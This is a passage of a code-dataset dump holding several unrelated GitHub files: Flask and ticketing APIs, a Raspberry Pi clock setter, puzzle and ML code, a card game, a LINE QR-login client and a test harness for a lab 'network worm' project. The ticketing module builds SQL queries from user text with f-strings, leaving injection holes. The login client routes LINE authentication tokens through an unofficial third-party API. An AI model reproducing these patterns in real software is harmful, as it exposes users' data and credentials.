request.json[\"description\"],\n \"price\": request.json[\"price\"],\n \"provenance\": request.json[\"provenance\"]\n }\n\n return jsonify(stockDao.create(item))\n \n\n\n\n#curl -X PUT -d \"{\\\"description\\\":\\\"new lad\\\", \\\"price\\\":567, \\\"provenance\\\":\\\"Cashel\\\"}\" -H \"Content-Type:application/json\" http://127.0.0.1:5000/stock/15\n@app.route('/stock/', methods=['PUT'])\ndef update(id):\n foundItem=stockDao.findById(id)\n print(foundItem)\n if foundItem == {}:#if ya find nothing with that id, code 404 shows up on the server, {} on the screen.\n return jsonify({}), 404\n currentItem = foundItem\n if 'description' in request.json:\n currentItem['description'] = request.json['description']\n if 'price' in request.json:\n currentItem['price'] = request.json['price']\n if 'provenance' in request.json:\n currentItem['provenance'] = request.json['provenance']\n stockDao.update(currentItem)\n return jsonify(currentItem)\n\n\n#λ curl -X DELETE http://127.0.0.1:5000/stock/17\n#{\n# \"done\": true\n#}\n\n@app.route('/stock/', methods=['DELETE'])\ndef delete(id):\n stockDao.delete(id)\n return jsonify({\"done\":True})\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"ClodaghMurphy/dataRepresentationProject","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25775566836","text":"#!/usr/bin/env python\n#\n# Test SDL_DS3231\n# John C. Shovic, SwitchDoc Labs\n# 08/03/2014\n#\n#\n\n# imports\n\nimport sys\nimport time\nimport datetime\nimport random \nimport ds3231\nimport os\nimport ntplib\n\n\n\nwhile True:\n try:\n rtc = ds3231.SDL_DS3231(1, 0x68)\n if(len(sys.argv) > 1):\n if(sys.argv[1] == '-i'):\n print('Using Internet to set time')\n client=ntplib.NTPClient()\n response = client.request('pool.ntp.org')\n dateToSet = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(response.tx_time))\n else:\n print('wrong input')\n sys.exit()\n else:\n print('manually input to set time')\n print()\n x = input(\"Please input date and time (format: 2022-12-30 16:59:59): \")\n print()\n f = \"%Y-%m-%d %H:%M:%S\"\n datetime.datetime.strptime(x,f)\n dateToSet = x\n\n command = 'sudo date -s \\\"'+dateToSet+'\\\"'\n# print(command)\n stream = os.popen(command)\n time.sleep(1)\n rtc.write_now()\n time.sleep(0.5)\n print(\"Time Setup Completed! 
RTC Configured...\")\n break\n except Exception as e:\n print(e)\n print(\"This is the incorrect format, must be in this format (format: 2022-12-30 16:59:59)\")","repo_name":"adnan6336/RaspberryPiCodes","sub_path":"RTCCode/setRTCTime.py","file_name":"setRTCTime.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38239509762","text":"import math\n\nfrom util import *\nfrom util import Grid as g\nimport itertools as it\nimport re\n\nh = Helper(18)\n\ninp = h.get_input_list()\n\n\ndef parse_numb(s):\n s = s.strip(\" \")\n\n depth = 0\n for i, c in enumerate(s):\n if c == \"[\":\n depth += 1\n elif c == \"]\":\n depth -= 1\n elif depth == 1 and c == \",\":\n s = s[:i] + \"#\" + s[i + 1:]\n s = s[1:-1]\n elements = s.split(\"#\")\n\n out = []\n for element in elements:\n try:\n out.append(int(element))\n except ValueError:\n out.append(parse_numb(element))\n return out\n\n\ndef add_nums(n1, n2):\n out = [n1.copy(), n2.copy()]\n\n while True:\n exploded = True\n while exploded:\n _, _, exploded = handle_explosion(out, 0)\n\n if not handle_split(out):\n break\n\n return out\n\n\ndef handle_explosion(arr: list, depth):\n prop_l, prop_r = None, None\n exploded = False\n i = 0\n for i, element in enumerate(arr):\n if type(element) == list:\n if depth == 3:\n arr[i] = 0\n prop_l, prop_r = element[0], element[1]\n exploded = True\n break\n else:\n prop_l, prop_r, exploded = handle_explosion(element, depth + 1)\n if exploded:\n break\n\n if prop_l is not None:\n if i - 1 >= 0:\n if type(arr[i - 1]) is int:\n arr[i - 1] += prop_l\n prop_l = None\n else:\n prop_arr = arr[i - 1]\n while True:\n if type(prop_arr[1]) is int:\n prop_arr[1] += prop_l\n prop_l = None\n break\n prop_arr = prop_arr[1]\n\n if prop_r is not None and i + 1 < len(arr):\n if type(arr[i + 1]) is int:\n arr[i + 1] += prop_r\n prop_r = None\n else:\n prop_arr = arr[i + 1]\n while True:\n if type(prop_arr[0]) is int:\n prop_arr[0] += prop_r\n prop_r = None\n break\n prop_arr = prop_arr[0]\n\n return prop_l, prop_r, exploded\n\n\ndef handle_split(arr):\n for i, e in enumerate(arr):\n if type(e) is int:\n if e > 9:\n arr[i] = [math.floor(e / 2), math.ceil(e / 2)]\n return True\n else:\n if handle_split(e):\n return True\n return False\n\n\ndef get_magnitude(arr):\n mag = 0\n\n weights = (3, 2)\n for i, e in enumerate(arr):\n if type(e) is int:\n mag += weights[i] * e\n else:\n mag += weights[i] * get_magnitude(e)\n return mag\n\n\nsum_arr = parse_numb(inp[0])\n\nfor numb in inp[1:]:\n sum_arr = add_nums(sum_arr, parse_numb(numb))\nprint(sum_arr)\n\nh.submit(get_magnitude(sum_arr))\n","repo_name":"NoahMollerstuen/Advent-of-Code","sub_path":"solutions/2021_day18/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26735735437","text":"import math\r\nimport torch\r\ntorch.pi = torch.acos(torch.zeros(1)).item() * 2 # which is 3.1415927410125732\r\nfrom torch import autograd\r\nfrom filing_paths import path_model\r\nimport sys\r\nsys.path.insert(1, path_model)\r\nfrom parameters import m, n, J, delta_t,delta_t_test,delta_t_gen, H_design, B, C, B_mod, C_mod, delta_t_mod, J_mod, H_mod, H_design_inv, H_mod_inv,RotMatrix\r\n\r\nif torch.cuda.is_available():\r\n cuda0 = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc.\r\n 
torch.set_default_tensor_type('torch.cuda.FloatTensor')\r\nelse:\r\n cuda0 = torch.device(\"cpu\")\r\n print(\"Running on the CPU\")\r\n\r\ndef f_test(x):\r\n \r\n #A = torch.add(torch.einsum('nhw,wa->nh', B, x).T,C)\r\n A = torch.add(torch.reshape(torch.matmul(B, x),(m,m)).T,C)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)\r\n for j in range(1,J+1):\r\n F_add = (torch.matrix_power(A*delta_t_test, j)/math.factorial(j)).to(cuda0)\r\n F = torch.add(F, F_add).to(cuda0)\r\n\r\n return torch.matmul(F, x)\r\n\r\ndef f_gen(x):\r\n\r\n #A = torch.add(torch.einsum('nhw,wa->nh', B, x).T,C)\r\n A = torch.add(torch.reshape(torch.matmul(B, x),(m,m)).T,C)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)\r\n for j in range(1,J+1):\r\n F_add = (torch.matrix_power(A*delta_t_gen, j)/math.factorial(j)).to(cuda0)\r\n F = torch.add(F, F_add).to(cuda0)\r\n\r\n return torch.matmul(F, x)\r\n\r\ndef f(x):\r\n\r\n #A = torch.add(torch.einsum('nhw,wa->nh', B, x).T,C)\r\n A = (torch.add(torch.reshape(torch.matmul(B, x),(m,m)).T,C)).to(cuda0)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)\r\n for j in range(1,J+1):\r\n F_add = (torch.matrix_power(A*delta_t, j)/math.factorial(j)).to(cuda0)\r\n F = torch.add(F, F_add).to(cuda0)\r\n\r\n return torch.matmul(F, x)\r\n\r\ndef h(x):\r\n return torch.matmul(H_design,x).to(cuda0)\r\n #return toSpherical(x)\r\n\r\ndef fInacc(x):\r\n\r\n #A = torch.add(torch.einsum('nhw,wa->nh', B, x).T,C)\r\n A = torch.add(torch.reshape(torch.matmul(B_mod, x),(m,m)).T,C_mod)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)\r\n for j in range(1,J_mod+1):\r\n F_add = (torch.matrix_power(A*delta_t_mod, j)/math.factorial(j)).to(cuda0)\r\n F = torch.add(F, F_add).to(cuda0)\r\n\r\n return torch.matmul(F, x)\r\n\r\ndef fRotate(x):\r\n A = (torch.add(torch.reshape(torch.matmul(B, x),(m,m)).T,C)).to(cuda0)\r\n A_rot = torch.mm(RotMatrix,A) \r\n # Taylor Expansion for F \r\n F = torch.eye(m)\r\n for j in range(1,J+1):\r\n F_add = (torch.matrix_power(A_rot*delta_t, j)/math.factorial(j)).to(cuda0)\r\n F = torch.add(F, F_add).to(cuda0)\r\n\r\n return torch.matmul(F, x)\r\n\r\ndef h_nonlinear(x):\r\n return toSpherical(x)\r\n\r\n\r\ndef f_interpolate(x, n=2):\r\n \r\n for _ in range(n):\r\n A = torch.add(torch.reshape(torch.matmul(B_mod, x),(m,m)).T,C_mod)#.to(dev, non_blocking=True)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)#.to(dev, non_blocking=True)\r\n for j in range(1,J+1):\r\n F_add = torch.matrix_power(A*delta_t/n, j)/math.factorial(j)\r\n F = torch.add(F, F_add)\r\n x = torch.matmul(F, x)\r\n return x\r\n\r\ndef f_interpolate_approx(x, n=2):\r\n\r\n for _ in range(n):\r\n A = torch.add(torch.reshape(torch.matmul(B_mod, x),(m,m)).T,C_mod)#.to(dev, non_blocking=True)\r\n \r\n # Taylor Expansion for F \r\n F = torch.eye(m)#.to(dev, non_blocking=True)\r\n for j in range(1,J_mod+1):\r\n F_add = torch.matrix_power(A*delta_t/n, j)/math.factorial(j)\r\n F = torch.add(F, F_add)\r\n x = torch.matmul(F, x)\r\n return x\r\n\r\n\r\ndef hInacc(x):\r\n return torch.matmul(H_mod,x)\r\n #return toSpherical(x)\r\n\r\ndef getJacobian(x, a):\r\n \r\n # if(x.size()[1] == 1):\r\n # y = torch.reshape((x.T),[x.size()[0]])\r\n try:\r\n if(x.size()[1] == 1):\r\n y = torch.reshape((x.T),[x.size()[0]])\r\n except:\r\n y = torch.reshape((x.T),[x.size()[0]])\r\n \r\n if(a == 'ObsAcc'):\r\n g = h\r\n elif(a == 'ModAcc'):\r\n g = f\r\n elif(a == 'ObsInacc'):\r\n g = hInacc\r\n elif(a == 'ModInacc'):\r\n g = fInacc\r\n\r\n Jac = autograd.functional.jacobian(g, y)\r\n Jac = 
Jac.view(-1,m)\r\n return Jac\r\n\r\ndef toSpherical(cart):\r\n\r\n rho = torch.norm(cart, p=2).view(1,1)\r\n phi = torch.atan2(cart[1, ...], cart[0, ...]).view(1, 1)\r\n phi = phi + (phi < 0).type_as(phi) * (2 * torch.pi)\r\n\r\n theta = torch.acos(cart[2, ...] / rho).view(1, 1)\r\n\r\n spher = torch.cat([rho, theta, phi], dim=0)\r\n\r\n return spher\r\n\r\ndef toCartesian(sphe):\r\n\r\n rho = sphe[0,:]\r\n theta = sphe[1,:]\r\n phi = sphe[2,:]\r\n\r\n x = (rho * torch.sin(theta) * torch.cos(phi)).view(1,-1)\r\n y = (rho * torch.sin(theta) * torch.sin(phi)).view(1,-1)\r\n z = (rho * torch.cos(theta)).view(1,-1)\r\n\r\n cart = torch.cat([x,y,z],dim=0)\r\n\r\n return cart\r\n\r\ndef hInv(y):\r\n return torch.matmul(H_design_inv,y)\r\n #return toCartesian(y)\r\n\r\n\r\ndef hInaccInv(y):\r\n return torch.matmul(H_mod_inv,y)\r\n #return toCartesian(y)\r\n\r\n'''\r\nx = torch.tensor([[1],[1],[1]]).float() \r\nH = getJacobian(x, 'ObsAcc')\r\nprint(H)\r\nprint(h(x))\r\n\r\nF = getJacobian(x, 'ModAcc')\r\nprint(F)\r\nprint(f(x))\r\n'''","repo_name":"KalmanNet/RTSNet_ICASSP22","sub_path":"Simulations/Lorenz_Atractor/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"2"} +{"seq_id":"25834117467","text":"import requests\r\nimport urllib.parse\r\n\r\nclass NewQRLogin:\r\n API_URL = \"https://api.lrtt.icu/secondaryQrCodeLogin.do\"\r\n HEADERS = ['android_lite', 'android', 'ios_ipad', 'ios', 'chrome', 'desktopwin', 'desktopmac']\r\n\r\n def parseLogin(this, loginInfo):\r\n return (loginInfo[\"token\"], loginInfo[\"certificate\"])\r\n\r\n def loginWithQrCode(self, header, certificate=\"\", callback=lambda output: print(output)):\r\n resp = requests.post(self.API_URL + \"/login?\" + urllib.parse.urlencode({\"header\": header, \"certificate\": certificate}))\r\n res = resp.json()\r\n if resp.status_code != 200:\r\n raise Exception(res)\r\n callback(\"Login URL: %s\" % (res[\"url\"]))\r\n\r\n while \"token\" not in res:\r\n resp = requests.post(self.API_URL + res[\"callback\"])\r\n res = resp.json()\r\n if resp.status_code != 200:\r\n raise Exception(res)\r\n\r\n if \"pin\" in res:\r\n callback(\"Input PIN: %s\" % (res[\"pin\"]))\r\n\r\n return res\r\n\r\nif __name__ == \"__main__\":\r\n qrv2 = NewQRLogin()\r\n qrv2.loginWithQrCode(\"android_lite\")\r\n","repo_name":"Gunggung/Gung5","sub_path":"newqr.py","file_name":"newqr.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5393633295","text":"from os import stat\nimport pymysql.cursors\nfrom datetime import date\nimport datetime\nimport sqlite3\n\nfrom models.ticket_model import Ticket\nfrom models.user_model import User\n\nclass Database():\n def __init__(self):\n self.connection = self._get_sql_connection()\n\n def __enter__(self):\n return self\n \n def __exit__(self, exc_type, exc_val, exc_tb):\n self.connection.commit()\n self.connection.close()\n\n def get_ticket_obj(self, ticket):\n t = self._get_ticket(ticket)[0]\n a = self._get_audits(ticket)\n return Ticket(ticket=t, audits=a)\n \n def get_all_open_tickets(self):\n l = []\n tickets = self._get_all_open_tickets()\n for ticket in tickets:\n l.append(Ticket(ticket=ticket))\n return l\n\n def update_or_solve_ticket(self, ticket_id, content, status, assignee_id):\n try:\n if status == \"solve\":\n self._update_ticket(ticket_id, content, assignee_id)\n self._solve_ticket(ticket_id)\n 
if status == \"update\":\n self._update_ticket(ticket_id, content, assignee_id)\n return 200\n except Exception as e:\n print(e)\n return 500\n\n def create_ticket(self, ticket):\n self._create_ticket(ticket.subject, ticket.content, ticket.user_id)\n\n def get_users(self):\n l = []\n users = self._get_users()\n for user in users:\n l.append(User(user))\n return l\n\n def close_connection(self):\n return self.connection.close()\n \n def _get_sql_connection(self):\n return sqlite3.connect(\"./database/ticketing.db\")\n\n def _get_audits(self, ticket_id):\n try:\n cursor = self.connection.cursor()\n cursor.row_factory = sqlite3.Row\n sql = f\"\"\"select a.*, u.name as user_name from audits a \n join users u on a.assignee_id = u.id\n where a.ticket_id={ticket_id}\n order by created_at desc\"\"\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return result\n\n except Exception as e:\n print(e)\n \n def _get_ticket(self, ticket_id):\n try:\n cursor = self.connection.cursor()\n cursor.row_factory = sqlite3.Row\n sql = f\"select * from tickets where id={ticket_id}\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return result\n\n except Exception as e:\n print(e)\n \n def _get_all_open_tickets(self):\n try:\n cursor = self.connection.cursor()\n cursor.row_factory = sqlite3.Row\n sql = f\"\"\"select t.id, t.subject, t.comment, t.requested_by, t.created_at from tickets t \n left join audits a on t.id = a.ticket_id\n where t.is_solved is not 1\n group by t.id, t.subject, t.comment, t.requested_by, t.created_at\"\"\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return result\n\n except Exception as e:\n print(e)\n\n def _update_ticket(self, ticket_id, content, assignee_id):\n try:\n cursor = self.connection.cursor()\n sql = f\"\"\"insert into audits (ticket_id, comment, assignee_id) values({ticket_id}, \"{content}\", {assignee_id})\"\"\"\n cursor.execute(sql)\n\n except Exception as e:\n print(e)\n\n def _solve_ticket(self, ticket_id):\n try:\n cursor = self.connection.cursor()\n sql = f\"\"\"update tickets set is_solved = 1 where id = {ticket_id}\"\"\"\n cursor.execute(sql)\n\n except Exception as e:\n print(e)\n \n def _get_users(self):\n try:\n cursor = self.connection.cursor()\n cursor.row_factory = sqlite3.Row\n sql = f\"\"\"select * from users\"\"\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return result\n\n except Exception as e:\n print(e)\n \n def _create_ticket(self, subject, content, user_id):\n try:\n cursor = self.connection.cursor()\n sql = f\"\"\"insert into tickets (subject, comment, requested_by) VALUES\n (\"{subject}\", \"{content}\", \"{user_id}\")\"\"\"\n cursor.execute(sql)\n\n except Exception as e:\n print(e)\n","repo_name":"adamjacobsson/ticketing","sub_path":"ticketing_api/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28916833256","text":"import random, threading, time\nfrom .player import Player\nfrom .prince import Prince\nfrom .princess import Princess\nfrom .countess import Countess\nfrom .guard import Guard\nfrom .baron import Baron\nfrom .priest import Priest\nfrom .handmaid import Handmaid\nfrom .king import King\nfrom QlearningEngineV3.AIV3 import AIV3\nfrom QlearningEngineV1.AIV1 import AIV1\nfrom QlearningEngineV3.io import DBAccess\n\ndb = DBAccess()\n\nclass Game(threading.Thread):\n\n \"\"\"\n Class representing a game of two players.\n \"\"\"\n\n def __init__(self,renderer,q):\n 
threading.Thread.__init__(self)\n self.daemon=True\n self.__q=q\n self.__draw = []\n self.__players = []\n self.__discard = []\n self.__renderer=renderer\n self.__nb_simulation = 1\n self.learning = 0\n self.start()\n\n def getQ(self):\n return self.__q\n def getDraw(self):\n return self.__draw\n def getPlayers(self):\n return self.__players\n def getDiscard(self):\n return self.__discard\n def getRenderer(self):\n return self.__renderer\n\n def run(self):\n \"\"\"Starts and plays a game between two players.\"\"\"\n infos=self.__q.get()\n self.__q.task_done()\n self.__q.join()\n num_player=1\n self.__nb_simulation = 1\n self.__renderer.setOneSide(infos[0][1] == 0 and infos[1][1] == 1 or infos[0][1] == 1 and infos[1][1] == 0)\n for info in infos:\n if info[1] == 0:\n self.__players.append(Player(num_player,info[0]))\n else:\n if info[2] == 1:\n self.__players.append(AIV3(num_player,0))\n else:\n self.__players.append(AIV1(num_player,0))\n num_player+=1\n #if(infos[0][2] == 1 or infos[1][2] == 1):\n # self.__renderer.askNbSimu()\n # self.__nb_simulation = int(self.__q.get())\n # self.__q.task_done()\n # self.__q.join()\n random.shuffle(self.__players)\n if not self.__renderer.getSimuMod():\n self.__renderer.displayMessage([\"{0} commence !\".format(self.__players[0].getName())])\n while self.__nb_simulation > 0:\n if self.__renderer.getSimuMod():\n self.__renderer.showNbSimu(self.__nb_simulation)\n while (self.__players[0].getScore() != 7 and self.__players[1].getScore() != 7):\n self.initRound()\n while not self.endRoundCondition():\n self.turn()\n self.endRound()\n winner = self.__players[1]\n looser = self.__players[0]\n if (self.__players[0].getScore() == 7): \n winner = self.__players[0]\n looser = self.__players[1]\n if (callable(getattr(self.__players[0], \"lastUpdate\", None)) or callable(getattr(self.__players[1], \"lastUpdate\", None))) and self.learning == 0:\n db.incrementStat(winner, looser, False)\n else:\n if not self.__renderer.getSimuMod():\n self.__renderer.displayMessage([\"{0} a gagné !\".format(winner.getName())])\n self.__players[0].setScore(0)\n self.__players[1].setScore(0)\n self.__nb_simulation-=1\n self.__renderer.end()\n \n def turn(self):\n \"\"\"Play a turn, meaning both players play a card.\"\"\"\n for player in self.__players:\n if (not self.endRoundCondition()):\n if not self.__renderer.getSimuMod():\n self.__renderer.swapPlayer(player.getName())\n player.setIsImmune(False)\n player.draw(self.__draw, self.__renderer)\n player.playCard(self)\n if not self.__renderer.getSimuMod():\n self.__renderer.initTurn(self.__players, player, self.__draw)\n\n def initRound(self):\n \"\"\"Initializes __draw, __discard, the players' hands and their boolean status flags for a new round.\"\"\"\n #self.__renderer.displayMessage([\"Nouveau round\"])\n self.__draw = [Princess(), Countess(), King(), Prince(), Prince(), Handmaid(), Handmaid(), \n Baron(), Baron(), Priest(), Priest(), Guard(), Guard(), Guard(), Guard(), Guard()]\n random.shuffle(self.__draw)\n self.__discard = [self.__draw.pop(0), self.__draw.pop(0), self.__draw.pop(0)]\n self.swapPlayersOrder()\n if not self.__renderer.getSimuMod():\n self.__renderer.initRound(self.__draw, self.__discard, self.__players)\n p=0\n for player in self.__players:\n hide = False if p == 0 else True\n player.setHand([])\n player.setDiscard([])\n player.setIsImmune(False)\n player.setIsKnockedOut(False)\n if callable(getattr(player, \"setMemorizedOpponentCard\", None)):\n player.setMemorizedOpponentCard(None)\n 
player.updateRemainingCards(self.__discard)\n if not self.__renderer.getSimuMod():\n if self.__renderer.getOneSide() and not callable(getattr(player,\"getSpecial\",None)):\n hide = False\n player.draw(self.__draw, self.__renderer, hide)\n p+=1\n\n def endRoundCondition(self):\n \"\"\"Return True if the conditions to finish the round are met.\"\"\" \n for player in self.__players:\n if player.getIsKnockedOut():\n return True\n if not self.__draw:\n return True\n return False\n \n def endRound(self):\n \"\"\"To call at the end of a round: determines the winner and updates the score.\"\"\" \n winner = self.__players[0]\n looser = self.__players[1]\n if (self.__players[1].getIsKnockedOut() or self.__players[0].getHand()[0].getValue() > self.__players[1].getHand()[0].getValue() and not self.__players[0].getIsKnockedOut()):\n self.__players[0].setScore(self.__players[0].getScore() + 1)\n elif (self.__players[0].getIsKnockedOut() or self.__players[1].getHand()[0].getValue() > self.__players[0].getHand()[0].getValue() and not self.__players[1].getIsKnockedOut()):\n self.__players[1].setScore(self.__players[1].getScore() + 1)\n winner = self.__players[1]\n looser = self.__players[0]\n elif (self.__players[1].calcTie() > self.__players[0].calcTie()):\n self.__players[1].setScore(self.__players[1].getScore() + 1)\n winner = self.__players[1]\n looser = self.__players[0]\n if callable(getattr(winner, \"lastUpdate\", None)):\n winner.lastUpdate(1)\n if callable(getattr(looser, \"lastUpdate\", None)):\n looser.lastUpdate(-1)\n if (callable(getattr(self.__players[0], \"lastUpdate\", None)) or callable(getattr(self.__players[1], \"lastUpdate\", None))) and self.learning == 0:\n db.incrementStat(winner, looser, True)\n if not self.__renderer.getSimuMod():\n self.__renderer.displayMessage([\"{0} a gagné le round !\".format(winner.getName()),\n \"Scores :\\n{0} : {1}\\n{2} : {3}\".format(self.__players[0].getName(), self.__players[0].getScore(),\n self.__players[1].getName(), self.__players[1].getScore())])\n def swapPlayersOrder(self):\n \"\"\"Swap the order of the players in the list of players to make them play first alternately.\n Swap only if it is not the first round.\n \"\"\" \n if self.__players[0].getScore() != 0 or self.__players[1].getScore() != 0:\n tmp_player = self.__players[0]\n self.__players[0] = self.__players[1]\n self.__players[1] = tmp_player\n","repo_name":"ElMitsuki/LoveLetter","sub_path":"gameEngine/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"26545436950","text":"from datetime import datetime\n\nimport pandas as pd\nimport pybaseball\nfrom pybaseball import statcast\n\nif __name__ == '__main__':\n pybaseball.cache.enable()\n #for i in range(1920,datetime.now().year + 1):\n for i in range(datetime.now().year,datetime.now().year + 1):\n print(i)\n season_df = statcast(start_dt=f'{i}-03-01', end_dt=f'{i}-12-01')\n # season = [game_year]\n #season_df['year'] = pd.DatetimeIndex(season_df['game_date']).year\n season_df['month'] = pd.DatetimeIndex(season_df['game_date']).month\n season_df['day'] = pd.DatetimeIndex(season_df['game_date']).day\n\n min_month = int(season_df['month'].min())\n max_month = int(season_df['month'].max())\n \n for j in range(min_month,max_month+1):\n month = 0\n if j < 10:\n month = f\"0{j}\"\n else:\n month = j\n \n month_df = season_df.loc[season_df['month'] == j]\n \n len_month_df = len(month_df)\n len_month_df 
= len_month_df // 2\n\n partOne = month_df.iloc[:len_month_df]\n partTwo = month_df.iloc[len_month_df:]\n \n partOne.to_csv(f'gamelogs/{i}_{month}_01_statcast.csv',index=False)\n partTwo.to_csv(f'gamelogs/{i}_{month}_02_statcast.csv',index=False)\n \n #print(season_df)\n","repo_name":"sportsdataverse/sportsdataverse-baseball-data","sub_path":"py_baseball_pbp.py","file_name":"py_baseball_pbp.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"3529579054","text":"#!/usr/bin/env python3\n\nimport argparse\nimport logging\nimport os\nimport re\nimport subprocess\nimport tempfile\nimport time\nimport unittest\nimport json\nimport requests\n\n\ndef create_http_URL(address, header=\"\"):\n return f\"http://{address}/{header}\"\n\n\ndef setup_worm():\n with open(\"../worm_segment/segment.bin\", \"rb\") as file:\n data = file.read()\n\n wormgate_URL = create_http_URL(f\"{args.host}:{args.port}\")\n response = requests.post(\n wormgate_URL + f\"worm_entrance?args={1}/{1}/{args.port}\", data=data\n )\n time.sleep(1)\n\n\ndef kill_worm():\n leader_URL = create_http_URL(f\"{args.host}:{args.port + 1}\")\n print(f\"kill{leader_URL}\")\n response = requests.post(f\"{leader_URL}kill\")\n print(response)\n\n\ndef test_grow_worm():\n full_result = []\n\n wormgate_URL = create_http_URL(f\"{args.host}:{args.port}\")\n leader_URL = create_http_URL(f\"{args.host}:{args.port + 1}\")\n\n for i in range(1):\n for max_segments in range(1, args.size + 1):\n result = {}\n response = requests.post(f\"{leader_URL}set_max_segments/{1}\")\n\n start_time = time.time()\n response = requests.post(f\"{leader_URL}set_max_segments/{max_segments}\")\n end_time = time.time() - start_time\n\n print(f\"grow from 1 to {max_segments} grow_time : {end_time}\")\n response = requests.post(f\"{leader_URL}set_max_segments/{1}\")\n\n result[\"max\"] = max_segments\n result[\"time\"] = end_time\n full_result.append(result)\n\n response = requests.post(f\"{leader_URL}set_max_segments/{1}\")\n with open(\"result/grow.json\", \"w+\") as file:\n json.dump(full_result, file)\n\n\ndef test_kill_worm():\n full_result = []\n\n wormgate_URL = create_http_URL(f\"{args.host}:{args.port}\", \"info\")\n leader_URL = create_http_URL(f\"{args.host}:{args.port + 1}\")\n response = requests.post(f\"{leader_URL}set_max_segments/{args.size}\")\n\n gate_info = requests.get(wormgate_URL, timeout=1).json()\n\n for i in range(3):\n for kill_size in range(2, 11):\n result = {}\n time.sleep(1)\n leader = requests.get(f\"{leader_URL}segment_info\", timeout=1).json()\n start_time = time.time()\n for i in range(1, kill_size):\n gate_URL = create_http_URL(gate_info[\"other_gates\"][i], \"kill_worms\")\n response = requests.post(gate_URL)\n for gate in gate_info[\"other_gates\"]:\n numseg = 0\n while numseg != 1:\n gate_url = create_http_URL(gate, \"info\")\n res = requests.get(gate_url, timeout=1).json()\n numseg = res[\"numsegments\"]\n end_time = time.time() - start_time\n print(f\"kille_size: {kill_size - 1} kill_time : {end_time}\")\n result[\"kill_size\"] = kill_size - 1\n result[\"time\"] = end_time\n full_result.append(result)\n\n response = requests.post(f\"{leader_URL}set_max_segments/{1}\")\n with open(\"result/kill.json\", \"w+\") as file:\n json.dump(full_result, file)\n\n\ndef build_arg_parser():\n parser = argparse.ArgumentParser(prog=\"test_segment.py\")\n\n parser.add_argument(\"-t\", \"--test\", type=int)\n parser.add_argument(\"-c\", \"--host\", 
type=str)\n parser.add_argument(\"-p\", \"--port\", type=int)\n parser.add_argument(\"-n\", \"--size\", type=int)\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = build_arg_parser()\n global args\n args = parser.parse_args()\n print(args)\n\n setup_worm()\n if args.test == 1:\n test_grow_worm()\n elif args.test == 2:\n test_kill_worm()\n\n kill_worm()\n","repo_name":"ThomasOttestad/Network-worm","sub_path":"test/test_segment.py","file_name":"test_segment.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12725572709","text":"import pandas as pd\nfrom sklearn.metrics import accuracy_score, average_precision_score, f1_score, precision_score, recall_score, \\\n roc_auc_score\n\nfrom abstractions.base_model import BaseModel\nfrom configs.config import categorical_features\nfrom utils.helpers import nominal_normalization\n\n\nclass TrainModel(BaseModel):\n\n def __init__(self, model):\n super().__init__(model)\n\n def preprocess(self, data: pd.DataFrame):\n categoricals = nominal_normalization(data[categorical_features])\n numerical_columns = data.drop(columns=categorical_features)\n return pd.concat([numerical_columns, categoricals],axis=1)\n\n def train(self, x_train: pd.DataFrame, y_train: pd.DataFrame):\n self.model.fit(x_train, y_train.ravel())\n\n def predict(self, X_test: pd.DataFrame) -> pd.DataFrame:\n return self.model.predict(X_test)\n\n def evaluate(self, y_real: pd.DataFrame, y_pred: pd.DataFrame):\n accuracy = accuracy_score(y_real, y_pred)\n average_precision = average_precision_score(y_real, y_pred)\n f1 = f1_score(y_real, y_pred)\n precision = precision_score(y_real, y_pred)\n recall = recall_score(y_real, y_pred)\n roc_auc = roc_auc_score(y_real, y_pred)\n\n label = ['Churn Prediction']\n v1 = [accuracy]\n v2 = [average_precision]\n v3 = [f1]\n v4 = [precision]\n v5 = [recall]\n v6 = [roc_auc]\n\n series = [{'label': 'Accuracy', 'values': v1},\n {'label': 'Average Precision Score', 'values': v2},\n {'label': 'f1 Score', 'values': v3},\n {'label': 'precision_score', 'values': v4},\n {'label': 'Recall Score', 'values': v5},\n {'label': 'Roc Auc Score', 'values': v6}]\n\n return {'labels': label, 'series': series}","repo_name":"MarinosGal/ChurnPrediction","sub_path":"churn_prediction/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"39609198681","text":"import os\nimport random\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom PIL import Image\nfrom torch.utils import data\nfrom tqdm import tqdm\n\nimport network\nimport utils\nfrom 